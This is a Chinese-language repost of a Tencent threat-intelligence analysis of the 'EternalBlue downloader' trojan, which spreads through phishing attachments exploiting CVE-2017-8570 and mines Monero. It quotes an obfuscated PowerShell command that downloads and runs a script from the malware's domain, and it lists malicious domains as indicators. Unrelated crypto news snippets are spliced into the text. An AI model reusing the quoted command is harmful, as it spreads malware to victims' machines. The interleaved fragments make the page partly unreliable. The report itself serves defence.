宇宙链 宇宙链
Ctrl+D收藏宇宙链
首页 > TRX > 正文

“永恒之蓝下载器木马”新增钓鱼邮件传播,利用用户机器挖矿门罗币

作者:

时间:1900/1/1 0:00:00

来源:腾讯御见威胁情报中心

编者注:原标题为《“永恒之蓝下载器木马”新增钓鱼邮件传播,附件含CVE-2017-8570漏洞攻击代码》

“永恒之蓝”下载器木马在感染用户机器上运行后,会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档,该文档附带CVE-2017-8570漏洞攻击代码。

近1亿枚USDT从Hotbit转入未知钱包:金色财经报道,据Whale Alert监测,5分钟前有99,999,990枚USDT(约100,069,989美元) 从Hotbit转入未知钱包。根据链上记录,该地址在不同交易所之间进行转账,疑似为第三方托管服务地址。[2023/6/27 22:02:17]

如果被攻击用户收到邮件并不慎打开文档,就可能触发漏洞执行Powershell命令下载mail.jsp:

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

Cardano链上稳定币COTI发行方Djed:2023年1月中旬生效新费用结构:金色财经报道,Cardano 链上稳定币 COTI 发行方 Djed 在 Medium 平台发布费用结构更新,在存款费用方面,费率降低 50%,从每笔存款 0.5% 降至 0.25%。在提款费用方面,将采取动态费率,金库存款时间越长,取款费率就越低(将低至 0.4%)。在清算风险费用方面,费率在 1%-5% 之间,收取的金额取决于提款时存款的健康状况。据悉,新的收费模式将从 2023 年 1 月 15 日开始生效,并将影响现有存款。Djed 还透露,将在未来几周公布 2023 年及以后的计划,包括金库更新等。[2022/12/30 22:16:24]

而下载使用的域名ap35nf7.jp实际上并没有注册,但是依然能够解析到地址:t.awcna.com,是因为被感染机器的本地hosts文件被篡改,使得随机生成的域名映射到木马使用的恶意地址,细节请参考御见威胁情报中心此前发布的报告:《“永恒之蓝下载器”木马篡改hosts指向随机域名,再用多个漏洞攻击内网挖矿》。

安全团队:MEV bot以太坊上地址遭到恶意利用,损失约1.6万美元:金色财经消息,据CertiK安全团队监测,北京时间2022年5月25日9:58:59,MEV bot以太坊上0x85e5c6cffd260a7f153b1f34b36f6dbeba3e279e地址遭到恶意利用,导致了价值约1.6万美元的资产损失。[2022/5/25 3:40:35]

本次攻击过程中,木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名,并在hosts文件中指向域名:

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp经过高度混淆,多次解密后可以看到其安装多个计划任务下载Powershell脚本执行,并使用了新的计划任务名:

“Bluetea“蓝茶。

“永恒之蓝”下载器木马自出现之后从未停止更新,从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀,并且通过安装多个类型的计划任务进行持久化。在传播方式上,最初通过供应链攻击积累一批感染机器后,又不断利用”永恒之蓝”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法进行扩散传播,近期又增加了DGA域名攻击和钓鱼邮件攻击,其最终目的只为利用用户机器挖矿门罗币获利。

永恒之蓝下载器木马的历次版本更新参考下表:

安全建议

1.建议用户不要轻易打开不明来源的邮件附件,对于邮件附件中的文件要格外谨慎运行,如发现有脚本或其他可执行文件可先使用杀软件进行扫描;

2.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP账号密码,切勿使用弱口令,避免遭遇弱密码爆破攻击;

3.根据微软安全公告及时修复Office漏洞CVE-2017-8570,需进行漏洞扫描和修复,或采用WindowsUpdate进行。

IOCs

http//t.awcna.com/mail.jsp

标签:COMSHELHELMAICOMOS FinanceSHELLMission HeliosCMAI币

TRX热门资讯
一周回顾:周融资事件跌至3起,CMC被币安并购创始人离职

摘要:币安收购Coinmarketcap;OKCoin宣布获得日本交易所牌照;门头沟清算赔偿方案延期;雄安区块链实验室正式挂牌;中互金协会提示参与境外虚拟货币交易平台投机炒作的风险。10家上市公司披露区块链相关业务或计划.

1900/1/1 0:00:00
30万美元的比特币密钥丢失后再次被找回,谷歌前工程师或许发现了一个金矿

在一位比特币所有者失去了价值30万美元的比特币后,密码学专家MikeStay设法在几个月内恢复了比特币。在昨天的博客文章中,Stay透露了他是如何实现的.

1900/1/1 0:00:00
数据:机构客户和零售客户对比特币的需求爆炸式增长

在“黑色星期四”之后,似乎在某些人眼里比特币已死:价值数亿美元的BitMEX期货合约头寸被清算,加密货币的市场流动性接近枯竭,推特加密社区一时鬼哭狼嚎.

1900/1/1 0:00:00
巴比特专访 | 海外知名团队亲述:疫情下的加密货币社区长啥样?

“重启2020”是开年以来社交媒体平台的热词,是我们对不友好的2020年的抗议。2020年我们最爱的科比离开了这个世界,西班牙遭遇超强暴风雪,东非陷入蝗灾危机,还有新冠病在全球肆虐。2019年12月1日,首例新冠肺炎患者发病.

1900/1/1 0:00:00
如何用美林时钟把握区块链投资?全球Top10加密基金为你揭秘 | 巴比特产业大课

2020年,最值得关注的3-5个投资方向有什么?熊市之中应当秉持怎样的投资逻辑?3月26日晚,巴比特产业大课第二期《金融是陷阱还是财富宝藏?——“区块链与金融”学习周》持续输出.

1900/1/1 0:00:00
还原HT搬砖套利流程:加密世界里的“智商税”陷阱

在互联网世界里,很多人都曾收到过一份中大奖邮件,奖金是58,000元与三星Q30?笔记本电脑一台,一般人看到后都会喜出望外,感觉自己是全天下最幸运的人,但假使你去领奖的时候却发现,领奖要先缴纳一笔手续费,一环扣一环.

1900/1/1 0:00:00